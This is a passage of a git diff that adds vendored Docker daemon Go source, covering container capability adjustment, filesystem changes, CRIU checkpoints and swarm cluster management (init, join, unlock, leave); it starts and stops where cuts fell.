+	}
+	// Capabilities contains all CapabilityMapping
+	Capabilities []*CapabilityMapping
+)
+
+// String returns <key> of CapabilityMapping
+func (c *CapabilityMapping) String() string {
+	return c.Key
+}
+
+// GetCapability returns CapabilityMapping which contains specific key
+func GetCapability(key string) *CapabilityMapping {
+	for _, capp := range capabilityList {
+		if capp.Key == key {
+			cpy := *capp
+			return &cpy
+		}
+	}
+	return nil
+}
+
+// GetAllCapabilities returns all of the capabilities
+func GetAllCapabilities() []string {
+	output := make([]string, len(capabilityList))
+	for i, capability := range capabilityList {
+		output[i] = capability.String()
+	}
+	return output
+}
+
+// TweakCapabilities can tweak capabilities by adding or dropping capabilities
+// based on the basics capabilities.
+func TweakCapabilities(basics, adds, drops []string) ([]string, error) {
+	var (
+		newCaps []string
+		allCaps = GetAllCapabilities()
+	)
+
+	// FIXME(tonistiigi): docker format is without CAP_ prefix, oci is with prefix
+	// Currently they are mixed in here. We should do conversion in one place.
+
+	// look for invalid cap in the drop list
+	for _, cap := range drops {
+		if strings.ToLower(cap) == "all" {
+			continue
+		}
+
+		if !stringutils.InSlice(allCaps, "CAP_"+cap) {
+			return nil, fmt.Errorf("Unknown capability drop: %q", cap)
+		}
+	}
+
+	// handle --cap-add=all
+	if stringutils.InSlice(adds, "all") {
+		basics = allCaps
+	}
+
+	if !stringutils.InSlice(drops, "all") {
+		for _, cap := range basics {
+			// skip `all` already handled above
+			if strings.ToLower(cap) == "all" {
+				continue
+			}
+
+			// if we don't drop `all`, add back all the non-dropped caps
+			if !stringutils.InSlice(drops, cap[4:]) {
+				newCaps = append(newCaps, strings.ToUpper(cap))
+			}
+		}
+	}
+
+	for _, cap := range adds {
+		// skip `all` already handled above
+		if strings.ToLower(cap) == "all" {
+			continue
+		}
+
+		cap = "CAP_" + cap
+
+		if !stringutils.InSlice(allCaps, cap) {
+			return nil, fmt.Errorf("Unknown capability to add: %q", cap)
+		}
+
+		// add cap if not already in the list
+		if !stringutils.InSlice(newCaps, cap) {
+			newCaps = append(newCaps, strings.ToUpper(cap))
+		}
+	}
+	return newCaps, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/changes.go b/vendor/github.com/docker/docker/daemon/changes.go
new file mode 100644
index 0000000000..fc8cd2752c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/changes.go
@@ -0,0 +1,31 @@
+package daemon
+
+import (
+	"errors"
+	"runtime"
+	"time"
+
+	"github.com/docker/docker/pkg/archive"
+)
+
+// ContainerChanges returns a list of container fs changes
+func (daemon *Daemon) ContainerChanges(name string) ([]archive.Change, error) {
+	start := time.Now()
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	if runtime.GOOS == "windows" && container.IsRunning() {
+		return nil, errors.New("Windows does not support diff of a running container")
+	}
+
+	container.Lock()
+	defer container.Unlock()
+	c, err := container.RWLayer.Changes()
+	if err != nil {
+		return nil, err
+	}
+	containerActions.WithValues("changes").UpdateSince(start)
+	return c, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/checkpoint.go b/vendor/github.com/docker/docker/daemon/checkpoint.go
new file mode 100644
index 0000000000..27181743f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/checkpoint.go
@@ -0,0 +1,110 @@
+package daemon
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/utils"
+)
+
+var (
+	validCheckpointNameChars   = utils.RestrictedNameChars
+	validCheckpointNamePattern = utils.RestrictedNamePattern
+)
+
+// CheckpointCreate checkpoints the process running in a container with CRIU
+func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreateOptions) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	if !container.IsRunning() {
+		return fmt.Errorf("Container %s not running", name)
+	}
+
+	var checkpointDir string
+	if config.CheckpointDir != "" {
+		checkpointDir = config.CheckpointDir
+	} else {
+		checkpointDir = container.CheckpointDir()
+	}
+
+	if !validCheckpointNamePattern.MatchString(config.CheckpointID) {
+		return fmt.Errorf("Invalid checkpoint ID (%s), only %s are allowed", config.CheckpointID, validCheckpointNameChars)
+	}
+
+	err = daemon.containerd.CreateCheckpoint(container.ID, config.CheckpointID, checkpointDir, config.Exit)
+	if err != nil {
+		return fmt.Errorf("Cannot checkpoint container %s: %s", name, err)
+	}
+
+	daemon.LogContainerEvent(container, "checkpoint")
+
+	return nil
+}
+
+// CheckpointDelete deletes the specified checkpoint
+func (daemon *Daemon) CheckpointDelete(name string, config types.CheckpointDeleteOptions) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	var checkpointDir string
+	if config.CheckpointDir != "" {
+		checkpointDir = config.CheckpointDir
+	} else {
+		checkpointDir = container.CheckpointDir()
+	}
+
+	return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID))
+}
+
+// CheckpointList lists all checkpoints of the specified container
+func (daemon *Daemon) CheckpointList(name string, config types.CheckpointListOptions) ([]types.Checkpoint, error) {
+	var out []types.Checkpoint
+
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	var checkpointDir string
+	if config.CheckpointDir != "" {
+		checkpointDir = config.CheckpointDir
+	} else {
+		checkpointDir = container.CheckpointDir()
+	}
+
+	if err := os.MkdirAll(checkpointDir, 0755); err != nil {
+		return nil, err
+	}
+
+	dirs, err := ioutil.ReadDir(checkpointDir)
+	if err != nil {
+		return nil, err
+	}
+
+	for _, d := range dirs {
+		if !d.IsDir() {
+			continue
+		}
+		path := filepath.Join(checkpointDir, d.Name(), "config.json")
+		data, err := ioutil.ReadFile(path)
+		if err != nil {
+			return nil, err
+		}
+		var cpt types.Checkpoint
+		if err := json.Unmarshal(data, &cpt); err != nil {
+			return nil, err
+		}
+		out = append(out, cpt)
+	}
+
+	return out, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster.go b/vendor/github.com/docker/docker/daemon/cluster.go
new file mode 100644
index 0000000000..98b2aa1e04
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster.go
@@ -0,0 +1,12 @@
+package daemon
+
+import (
+	apitypes "github.com/docker/docker/api/types"
+)
+
+// Cluster is the interface for github.com/docker/docker/daemon/cluster.(*Cluster).
+type Cluster interface {
+	GetNetwork(input string) (apitypes.NetworkResource, error)
+	GetNetworks() ([]apitypes.NetworkResource, error)
+	RemoveNetwork(input string) error
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/cluster.go b/vendor/github.com/docker/docker/daemon/cluster/cluster.go
new file mode 100644
index 0000000000..4af035b523
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/cluster.go
@@ -0,0 +1,1973 @@
+package cluster
+
+import (
+	"crypto/x509"
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	distreference "github.com/docker/distribution/reference"
+	apierrors "github.com/docker/docker/api/errors"
+	apitypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/network"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	executorpkg "github.com/docker/docker/daemon/cluster/executor"
+	"github.com/docker/docker/daemon/cluster/executor/container"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/runconfig"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/manager/encryption"
+	swarmnode "github.com/docker/swarmkit/node"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+	"google.golang.org/grpc"
+)
+
+const swarmDirName = "swarm"
+const controlSocket = "control.sock"
+const swarmConnectTimeout = 20 * time.Second
+const swarmRequestTimeout = 20 * time.Second
+const stateFile = "docker-state.json"
+const defaultAddr = "0.0.0.0:2377"
+
+const (
+	initialReconnectDelay = 100 * time.Millisecond
+	maxReconnectDelay     = 30 * time.Second
+	contextPrefix         = "com.docker.swarm"
+)
+
+// ErrNoSwarm is returned on leaving a cluster that was never initialized
+var ErrNoSwarm = fmt.Errorf("This node is not part of a swarm")
+
+// ErrSwarmExists is returned on initialize or join request for a cluster that has already been activated
+var ErrSwarmExists = fmt.Errorf("This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one.")
+
+// ErrPendingSwarmExists is returned on initialize or join request for a cluster that is already processing a similar request but has not succeeded yet.
+var ErrPendingSwarmExists = fmt.Errorf("This node is processing an existing join request that has not succeeded yet. Use \"docker swarm leave\" to cancel the current request.")
+
+// ErrSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached.
+var ErrSwarmJoinTimeoutReached = fmt.Errorf("Timeout was reached before node was joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node.")
+
+// ErrSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it.
+var ErrSwarmLocked = fmt.Errorf("Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it.")
+
+// ErrSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically.
+var ErrSwarmCertificatesExpired = errors.New("Swarm certificates have expired. To replace them, leave the swarm and join again.")
+
+// NetworkSubnetsProvider exposes functions for retrieving the subnets
+// of networks managed by Docker, so they can be filtered.
+type NetworkSubnetsProvider interface {
+	V4Subnets() []net.IPNet
+	V6Subnets() []net.IPNet
+}
+
+// Config provides values for Cluster.
+type Config struct {
+	Root                   string
+	Name                   string
+	Backend                executorpkg.Backend
+	NetworkSubnetsProvider NetworkSubnetsProvider
+
+	// DefaultAdvertiseAddr is the default host/IP or network interface to use
+	// if no AdvertiseAddr value is specified.
+	DefaultAdvertiseAddr string
+
+	// path to store runtime state, such as the swarm control socket
+	RuntimeRoot string
+}
+
+// Cluster provides capabilities to participate in a cluster as a worker or a
+// manager.
+type Cluster struct {
+	sync.RWMutex
+	*node
+	root            string
+	runtimeRoot     string
+	config          Config
+	configEvent     chan struct{} // todo: make this array and goroutine safe
+	actualLocalAddr string        // after resolution, not persisted
+	stop            bool
+	err             error
+	cancelDelay     func()
+	attachers       map[string]*attacher
+	locked          bool
+	lastNodeConfig  *nodeStartConfig
+}
+
+// attacher manages the in-memory attachment state of a container
+// attachment to a global scope network managed by swarm manager. It
+// helps in identifying the attachment ID via the taskID and the
+// corresponding attachment configuration obtained from the manager.
+type attacher struct {
+	taskID           string
+	config           *network.NetworkingConfig
+	attachWaitCh     chan *network.NetworkingConfig
+	attachCompleteCh chan struct{}
+	detachWaitCh     chan struct{}
+}
+
+type node struct {
+	*swarmnode.Node
+	done           chan struct{}
+	ready          bool
+	conn           *grpc.ClientConn
+	client         swarmapi.ControlClient
+	logs           swarmapi.LogsClient
+	reconnectDelay time.Duration
+	config         nodeStartConfig
+}
+
+// nodeStartConfig holds configuration needed to start a new node. Exported
+// fields of this structure are saved to disk in json. Unexported fields
+// contain data that shouldn't be persisted between daemon reloads.
+type nodeStartConfig struct {
+	// LocalAddr is this machine's local IP or hostname, if specified.
+	LocalAddr string
+	// RemoteAddr is the address that was given to "swarm join". It is used
+	// to find LocalAddr if necessary.
+	RemoteAddr string
+	// ListenAddr is the address we bind to, including a port.
+	ListenAddr string
+	// AdvertiseAddr is the address other nodes should connect to,
+	// including a port.
+	AdvertiseAddr   string
+	joinAddr        string
+	forceNewCluster bool
+	joinToken       string
+	lockKey         []byte
+	autolock        bool
+}
+
+// New creates a new Cluster instance using provided config.
+func New(config Config) (*Cluster, error) {
+	root := filepath.Join(config.Root, swarmDirName)
+	if err := os.MkdirAll(root, 0700); err != nil {
+		return nil, err
+	}
+	if config.RuntimeRoot == "" {
+		config.RuntimeRoot = root
+	}
+	if err := os.MkdirAll(config.RuntimeRoot, 0700); err != nil {
+		return nil, err
+	}
+	c := &Cluster{
+		root:        root,
+		config:      config,
+		configEvent: make(chan struct{}, 10),
+		runtimeRoot: config.RuntimeRoot,
+		attachers:   make(map[string]*attacher),
+	}
+
+	nodeConfig, err := c.loadState()
+	if err != nil {
+		if os.IsNotExist(err) {
+			return c, nil
+		}
+		return nil, err
+	}
+
+	n, err := c.startNewNode(*nodeConfig)
+	if err != nil {
+		return nil, err
+	}
+
+	select {
+	case <-time.After(swarmConnectTimeout):
+		logrus.Error("swarm component could not be started before timeout was reached")
+	case <-n.Ready():
+	case <-n.done:
+		if errors.Cause(c.err) == ErrSwarmLocked {
+			return c, nil
+		}
+		if err, ok := errors.Cause(c.err).(x509.CertificateInvalidError); ok && err.Reason == x509.Expired {
+			c.err = ErrSwarmCertificatesExpired
+			return c, nil
+		}
+		return nil, fmt.Errorf("swarm component could not be started: %v", c.err)
+	}
+	go c.reconnectOnFailure(n)
+	return c, nil
+}
+
+func (c *Cluster) loadState() (*nodeStartConfig, error) {
+	dt, err := ioutil.ReadFile(filepath.Join(c.root, stateFile))
+	if err != nil {
+		return nil, err
+	}
+	// missing certificate means no actual state to restore from
+	if _, err := os.Stat(filepath.Join(c.root, "certificates/swarm-node.crt")); err != nil {
+		if os.IsNotExist(err) {
+			c.clearState()
+		}
+		return nil, err
+	}
+	var st nodeStartConfig
+	if err := json.Unmarshal(dt, &st); err != nil {
+		return nil, err
+	}
+	return &st, nil
+}
+
+func (c *Cluster) saveState(config nodeStartConfig) error {
+	dt, err := json.Marshal(config)
+	if err != nil {
+		return err
+	}
+	return ioutils.AtomicWriteFile(filepath.Join(c.root, stateFile), dt, 0600)
+}
+
+func (c *Cluster) reconnectOnFailure(n *node) {
+	for {
+		<-n.done
+		c.Lock()
+		if c.stop || c.node != nil {
+			c.Unlock()
+			return
+		}
+		n.reconnectDelay *= 2
+		if n.reconnectDelay > maxReconnectDelay {
+			n.reconnectDelay = maxReconnectDelay
+		}
+		logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds())
+		delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay)
+		c.cancelDelay = cancel
+		c.Unlock()
+		<-delayCtx.Done()
+		if delayCtx.Err() != context.DeadlineExceeded {
+			return
+		}
+		c.Lock()
+		if c.node != nil {
+			c.Unlock()
+			return
+		}
+		var err error
+		config := n.config
+		config.RemoteAddr = c.getRemoteAddress()
+		config.joinAddr = config.RemoteAddr
+		n, err = c.startNewNode(config)
+		if err != nil {
+			c.err = err
+			close(n.done)
+		}
+		c.Unlock()
+	}
+}
+
+func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) {
+	if err := c.config.Backend.IsSwarmCompatible(); err != nil {
+		return nil, err
+	}
+
+	actualLocalAddr := conf.LocalAddr
+	if actualLocalAddr == "" {
+		// If localAddr was not specified, resolve it automatically
+		// based on the route to joinAddr. localAddr can only be left
+		// empty on "join".
+		listenHost, _, err := net.SplitHostPort(conf.ListenAddr)
+		if err != nil {
+			return nil, fmt.Errorf("could not parse listen address: %v", err)
+		}
+
+		listenAddrIP := net.ParseIP(listenHost)
+		if listenAddrIP == nil || !listenAddrIP.IsUnspecified() {
+			actualLocalAddr = listenHost
+		} else {
+			if conf.RemoteAddr == "" {
+				// Should never happen except using swarms created by
+				// old versions that didn't save remoteAddr.
+				conf.RemoteAddr = "8.8.8.8:53"
+			}
+			conn, err := net.Dial("udp", conf.RemoteAddr)
+			if err != nil {
+				return nil, fmt.Errorf("could not find local IP address: %v", err)
+			}
+			localHostPort := conn.LocalAddr().String()
+			actualLocalAddr, _, _ = net.SplitHostPort(localHostPort)
+			conn.Close()
+		}
+	}
+
+	var control string
+	if runtime.GOOS == "windows" {
+		control = `\\.\pipe\` + controlSocket
+	} else {
+		control = filepath.Join(c.runtimeRoot, controlSocket)
+	}
+
+	c.node = nil
+	c.cancelDelay = nil
+	c.stop = false
+	n, err := swarmnode.New(&swarmnode.Config{
+		Hostname:           c.config.Name,
+		ForceNewCluster:    conf.forceNewCluster,
+		ListenControlAPI:   control,
+		ListenRemoteAPI:    conf.ListenAddr,
+		AdvertiseRemoteAPI: conf.AdvertiseAddr,
+		JoinAddr:           conf.joinAddr,
+		StateDir:           c.root,
+		JoinToken:          conf.joinToken,
+		Executor:           container.NewExecutor(c.config.Backend),
+		HeartbeatTick:      1,
+		ElectionTick:       3,
+		UnlockKey:          conf.lockKey,
+		AutoLockManagers:   conf.autolock,
+		PluginGetter:       c.config.Backend.PluginGetter(),
+	})
+
+	if err != nil {
+		return nil, err
+	}
+	ctx := context.Background()
+	if err := n.Start(ctx); err != nil {
+		return nil, err
+	}
+	node := &node{
+		Node:           n,
+		done:           make(chan struct{}),
+		reconnectDelay: initialReconnectDelay,
+		config:         conf,
+	}
+	c.node = node
+	c.actualLocalAddr = actualLocalAddr // not saved
+	c.saveState(conf)
+
+	c.config.Backend.DaemonJoinsCluster(c)
+	go func() {
+		err := detectLockedError(n.Err(ctx))
+		if err != nil {
+			logrus.Errorf("cluster exited with error: %v", err)
+		}
+		c.Lock()
+		c.node = nil
+		c.err = err
+		if errors.Cause(err) == ErrSwarmLocked {
+			c.locked = true
+			confClone := conf
+			c.lastNodeConfig = &confClone
+		}
+		c.Unlock()
+		close(node.done)
+	}()
+
+	go func() {
+		select {
+		case <-n.Ready():
+			c.Lock()
+			node.ready = true
+			c.err = nil
+			c.Unlock()
+		case <-ctx.Done():
+		}
+		c.configEvent <- struct{}{}
+	}()
+
+	go func() {
+		for conn := range n.ListenControlSocket(ctx) {
+			c.Lock()
+			if node.conn != conn {
+				if conn == nil {
+					node.client = nil
+					node.logs = nil
+				} else {
+					node.client = swarmapi.NewControlClient(conn)
+					node.logs = swarmapi.NewLogsClient(conn)
+				}
+			}
+			node.conn = conn
+			c.Unlock()
+			c.configEvent <- struct{}{}
+		}
+	}()
+
+	return node, nil
+}
+
+// Init initializes new cluster from user provided request.
+func (c *Cluster) Init(req types.InitRequest) (string, error) {
+	c.Lock()
+	if c.swarmExists() {
+		if !req.ForceNewCluster {
+			c.Unlock()
+			return "", ErrSwarmExists
+		}
+		if err := c.stopNode(); err != nil {
+			c.Unlock()
+			return "", err
+		}
+	}
+
+	if err := validateAndSanitizeInitRequest(&req); err != nil {
+		c.Unlock()
+		return "", err
+	}
+
+	listenHost, listenPort, err := resolveListenAddr(req.ListenAddr)
+	if err != nil {
+		c.Unlock()
+		return "", err
+	}
+
+	advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort)
+	if err != nil {
+		c.Unlock()
+		return "", err
+	}
+
+	localAddr := listenHost
+
+	// If the local address is undetermined, the advertise address
+	// will be used as local address, if it belongs to this system.
+	// If the advertise address is not local, then we try to find
+	// a system address to use as local address. If this fails,
+	// we give up and ask user to pass the listen address.
+	if net.ParseIP(localAddr).IsUnspecified() {
+		advertiseIP := net.ParseIP(advertiseHost)
+
+		found := false
+		for _, systemIP := range listSystemIPs() {
+			if systemIP.Equal(advertiseIP) {
+				localAddr = advertiseIP.String()
+				found = true
+				break
+			}
+		}
+
+		if !found {
+			ip, err := c.resolveSystemAddr()
+			if err != nil {
+				c.Unlock()
+				logrus.Warnf("Could not find a local address: %v", err)
+				return "", errMustSpecifyListenAddr
+			}
+			localAddr = ip.String()
+		}
+	}
+
+	// todo: check current state existing
+	n, err := c.startNewNode(nodeStartConfig{
+		forceNewCluster: req.ForceNewCluster,
+		autolock:        req.AutoLockManagers,
+		LocalAddr:       localAddr,
+		ListenAddr:      net.JoinHostPort(listenHost, listenPort),
+		AdvertiseAddr:   net.JoinHostPort(advertiseHost, advertisePort),
+	})
+	if err != nil {
+		c.Unlock()
+		return "", err
+	}
+	c.Unlock()
+
+	select {
+	case <-n.Ready():
+		if err := initClusterSpec(n, req.Spec); err != nil {
+			return "", err
+		}
+		go c.reconnectOnFailure(n)
+		return n.NodeID(), nil
+	case <-n.done:
+		c.RLock()
+		defer c.RUnlock()
+		if !req.ForceNewCluster { // if failure on first attempt don't keep state
+			if err := c.clearState(); err != nil {
+				return "", err
+			}
+		}
+		return "", c.err
+	}
+}
+
+// Join makes current Cluster part of an existing swarm cluster.
+func (c *Cluster) Join(req types.JoinRequest) error {
+	c.Lock()
+	if c.swarmExists() {
+		c.Unlock()
+		return ErrSwarmExists
+	}
+	if err := validateAndSanitizeJoinRequest(&req); err != nil {
+		c.Unlock()
+		return err
+	}
+
+	listenHost, listenPort, err := resolveListenAddr(req.ListenAddr)
+	if err != nil {
+		c.Unlock()
+		return err
+	}
+
+	var advertiseAddr string
+	if req.AdvertiseAddr != "" {
+		advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort)
+		// For joining, we don't need to provide an advertise address,
+		// since the remote side can detect it.
+		if err == nil {
+			advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort)
+		}
+	}
+
+	// todo: check current state existing
+	n, err := c.startNewNode(nodeStartConfig{
+		RemoteAddr:    req.RemoteAddrs[0],
+		ListenAddr:    net.JoinHostPort(listenHost, listenPort),
+		AdvertiseAddr: advertiseAddr,
+		joinAddr:      req.RemoteAddrs[0],
+		joinToken:     req.JoinToken,
+	})
+	if err != nil {
+		c.Unlock()
+		return err
+	}
+	c.Unlock()
+
+	select {
+	case <-time.After(swarmConnectTimeout):
+		// attempt to connect will continue in background, but reconnect only if it didn't fail
+		go func() {
+			select {
+			case <-n.Ready():
+				c.reconnectOnFailure(n)
+			case <-n.done:
+				logrus.Errorf("failed to join the cluster: %+v", c.err)
+			}
+		}()
+		return ErrSwarmJoinTimeoutReached
+	case <-n.Ready():
+		go c.reconnectOnFailure(n)
+		return nil
+	case <-n.done:
+		c.RLock()
+		defer c.RUnlock()
+		return c.err
+	}
+}
+
+// GetUnlockKey returns the unlock key for the swarm.
+func (c *Cluster) GetUnlockKey() (string, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return "", c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	client := swarmapi.NewCAClient(c.conn)
+
+	r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{})
+	if err != nil {
+		return "", err
+	}
+
+	if len(r.UnlockKey) == 0 {
+		// no key
+		return "", nil
+	}
+
+	return encryption.HumanReadableKey(r.UnlockKey), nil
+}
+
+// UnlockSwarm provides a key to decrypt data that is encrypted at rest.
+func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error {
+	c.RLock()
+	if !c.isActiveManager() {
+		if err := c.errNoManager(); err != ErrSwarmLocked {
+			c.RUnlock()
+			return err
+		}
+	}
+
+	if c.node != nil || c.locked != true {
+		c.RUnlock()
+		return errors.New("swarm is not locked")
+	}
+	c.RUnlock()
+
+	key, err := encryption.ParseHumanReadableKey(req.UnlockKey)
+	if err != nil {
+		return err
+	}
+
+	c.Lock()
+	config := *c.lastNodeConfig
+	config.lockKey = key
+	n, err := c.startNewNode(config)
+	if err != nil {
+		c.Unlock()
+		return err
+	}
+	c.Unlock()
+	select {
+	case <-n.Ready():
+	case <-n.done:
+		if errors.Cause(c.err) == ErrSwarmLocked {
+			return errors.New("swarm could not be unlocked: invalid key provided")
+		}
+		return fmt.Errorf("swarm component could not be started: %v", c.err)
+	}
+	go c.reconnectOnFailure(n)
+	return nil
+}
+
+// stopNode is a helper that stops the active c.node and waits until it has
+// shut down. Call while keeping the cluster lock.
+func (c *Cluster) stopNode() error {
+	if c.node == nil {
+		return nil
+	}
+	c.stop = true
+	if c.cancelDelay != nil {
+		c.cancelDelay()
+		c.cancelDelay = nil
+	}
+	node := c.node
+	ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
+	defer cancel()
+	// TODO: can't hold lock on stop because it calls back to network
+	c.Unlock()
+	defer c.Lock()
+	if err := node.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") {
+		return err
+	}
+	<-node.done
+	return nil
+}
+
+func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool {
+	return reachable-2 <= unreachable
+}
+
+func isLastManager(reachable, unreachable int) bool {
+	return reachable == 1 && unreachable == 0
+}
+
+// Leave shuts down Cluster and removes current state.
+func (c *Cluster) Leave(force bool) error {
+	c.Lock()
+	node := c.node
+	if node == nil {
+		if c.locked {
+			c.locked = false
+			c.lastNodeConfig = nil
+			c.Unlock()
+		} else if c.err == ErrSwarmCertificatesExpired {
+			c.err = nil
+			c.Unlock()
+		} else {
+			c.Unlock()
+			return ErrNoSwarm
+		}
+	} else {
+		if node.Manager() != nil && !force {
+			msg := "You are attempting to leave the swarm on a node that is participating as a manager. "
+			if c.isActiveManager() {
+				active, reachable, unreachable, err := c.managerStats()
+				if err == nil {
+					if active && removingManagerCausesLossOfQuorum(reachable, unreachable) {
+						if isLastManager(reachable, unreachable) {
+							msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. "
+							c.Unlock()
+							return fmt.Errorf(msg)
+						}
+						msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable)
+					}
+				}
+			} else {
+				msg += "Doing so may lose the consensus of your cluster. "
+			}
+
+			msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message."
+			c.Unlock()
+			return fmt.Errorf(msg)
+		}
+		if err := c.stopNode(); err != nil {
+			logrus.Errorf("failed to shut down cluster node: %v", err)
+			signal.DumpStacks("")
+			c.Unlock()
+			return err
+		}
+		c.Unlock()
+		if nodeID := node.NodeID(); nodeID != "" {
+			nodeContainers, err := c.listContainerForNode(nodeID)
+			if err != nil {
+				return err
+			}
+			for _, id := range nodeContainers {
+				if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil {
+					logrus.Errorf("error removing %v: %v", id, err)
+				}
+			}
+		}
+	}
+	c.configEvent <- struct{}{}
+	// todo: cleanup optional?
+	if err := c.clearState(); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) {
+	var ids []string
+	filters := filters.NewArgs()
+	filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID))
+	containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{
+		Filters: filters,
+	})
+	if err != nil {
+		return []string{}, err
+	}
+	for _, c := range containers {
+		ids = append(ids, c.ID)
+	}
+	return ids, nil
+}
+
+func (c *Cluster) clearState() error {
+	// todo: backup this data instead of removing?
+	if err := os.RemoveAll(c.root); err != nil {
+		return err
+	}
+	if err := os.MkdirAll(c.root, 0700); err != nil {
+		return err
+	}
+	c.config.Backend.DaemonLeavesCluster()
+	return nil
+}
+
+func (c *Cluster) getRequestContext() (context.Context, func()) { // TODO: not needed when requests don't block on qourum lost
+	return context.WithTimeout(context.Background(), swarmRequestTimeout)
+}
+
+// Inspect retrieves the configuration properties of a managed swarm cluster.
+func (c *Cluster) Inspect() (types.Swarm, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return types.Swarm{}, c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	swarm, err := getSwarm(ctx, c.client)
+	if err != nil {
+		return types.Swarm{}, err
+	}
+
+	return convert.SwarmFromGRPC(*swarm), nil
+}
+
+// Update updates configuration of a managed swarm cluster.
+func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	swarm, err := getSwarm(ctx, c.client)
+	if err != nil {
+		return err
+	}
+
+	// In update, client should provide the complete spec of the swarm, including
+	// Name and Labels. If a field is specified with 0 or nil, then the default value
+	// will be used to swarmkit.
+	clusterSpec, err := convert.SwarmSpecToGRPC(spec)
+	if err != nil {
+		return err
+	}
+
+	_, err = c.client.UpdateCluster(
+		ctx,
+		&swarmapi.UpdateClusterRequest{
+			ClusterID: swarm.ID,
+			Spec:      &clusterSpec,
+			ClusterVersion: &swarmapi.Version{
+				Index: version,
+			},
+			Rotation: swarmapi.KeyRotation{
+				WorkerJoinToken:  flags.RotateWorkerToken,
+				ManagerJoinToken: flags.RotateManagerToken,
+				ManagerUnlockKey: flags.RotateManagerUnlockKey,
+			},
+		},
+	)
+	return err
+}
+
+// IsManager returns true if Cluster is participating as a manager.
+func (c *Cluster) IsManager() bool {
+	c.RLock()
+	defer c.RUnlock()
+	return c.isActiveManager()
+}
+
+// IsAgent returns true if Cluster is participating as a worker/agent.
+func (c *Cluster) IsAgent() bool {
+	c.RLock()
+	defer c.RUnlock()
+	return c.node != nil && c.ready
+}
+
+// GetLocalAddress returns the local address.
+func (c *Cluster) GetLocalAddress() string {
+	c.RLock()
+	defer c.RUnlock()
+	return c.actualLocalAddr
+}
+
+// GetListenAddress returns the listen address.
+func (c *Cluster) GetListenAddress() string {
+	c.RLock()
+	defer c.RUnlock()
+	if c.node != nil {
+		return c.node.config.ListenAddr
+	}
+	return ""
+}
+
+// GetAdvertiseAddress returns the remotely reachable address of this node.
+func (c *Cluster) GetAdvertiseAddress() string {
+	c.RLock()
+	defer c.RUnlock()
+	if c.node != nil && c.node.config.AdvertiseAddr != "" {
